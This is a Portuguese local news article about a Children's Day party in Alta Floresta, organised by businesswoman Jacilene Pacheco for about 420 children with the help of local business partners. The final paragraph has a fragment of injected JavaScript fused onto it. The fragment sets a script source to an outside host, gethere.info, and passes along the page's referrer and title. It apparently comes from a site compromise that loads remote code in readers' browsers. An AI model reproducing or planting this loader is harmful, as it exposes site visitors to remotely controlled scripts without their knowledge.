Capa / Educação / Empresária realiza festa para as crianças e agradece parcerias

Empresária realiza festa para as crianças e agradece parcerias

empresaria-realiza-festa-para-as-criancas-e-agradece-parcerias2Dionéia Martins

Apostar na alegria. Esse foi a bandeira da primeira festa “Criança Feliz”, realizada na quarta-feira, 12, pelo Gold Eventos, em Alta Floresta. A ação extraordinária realizada no Dia das Crianças envolveu a participação de empresários e colaboradores. A iniciativa partiu da empresária Jacilene Pacheco e ganhou a adesão de um pequeno grupo de abnegados colaboradores.

A ação beneficiou cerca de 420 crianças que são assistidas pela Igreja Batista em diversos bairros da cidade. A Prefeitura Municipal de Alta Floresta por meio da Secretaria de Educação foi parceira do evento no transporte das crianças até o Gold Eventos. Na entrada as crianças se deslumbraram com uma decoração especialmente para elas. A empresária Alice Farina, da Alice Festas, foi quem preparou a recepção dos “pequenos” com dois painéis decorados, um para as meninas e o outro para os meninos.

A ideia de proporcionar um dia de diversão para as crianças conquistou rapidamente a adesão de amigos, e o que seria apenas uma atividade comemorativa, se transformou na maior demonstração de carinho e amor. As crianças assistiram ao filme Divertida Mente, com direito a pipoca, mas antes se deliciaram com um delicioso macarrão, e ao final cachorro quente, tudo isso com muito suco.

empresaria-realiza-festa-para-as-criancas-e-agradece-parceriasO pastor da Igreja Batista Amarildo esteve presente acompanhada da Juíza Janaina Rebucci Dezanetti, que deram as boas-vindas e ambos fizeram uma oração de acolhida para os homenageados da festa. Jacilene fez questão de agradecer a todos os colaboradores e amigos . “A ideia era fazer um filme com pipoca, mais quando eu falava para os amigos eles queriam ajudar, e foi uma festa maravilhosa. Quero agradecer de coração a cada um deles, que deixaram seus lares e familiares em pleno feriado para ajudar”, disse Jaci.

O primeiro “Criança Feliz” também contou a parceria da Alice – Alice festas, Valéria – La Bella Casa, Rodrigo – Divina Pizza, Nilza – Mercearia Modelo, Leana Reis – Leana Marmitaria, Camila – Hotel Mandino, Amaro – Paolla, Edson Barreto Meneses, Samuel Vogetta Da Silva, Leandro – Studio Moraes, Mayara Madeira, Sérgio Passos, Leandra Coutinho, Dra. Beth Araujo, Carolina Belucio, Cripa, Patricia Pulido, Rato – Nosso Mercado, Patrick – Merc.Aragon, Taniele Angelo, Zilda Dias, Gabriel, Francisca.

Jacilene Pacheco disse que foi um dia de muita diversão não só para as crianças, mas também para todos que estavam envolvidos com os preparativos. “Foi um dia maravilhoso, nos divertimos muito enquanto preparávamos tudo”, manifestou Jaci.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top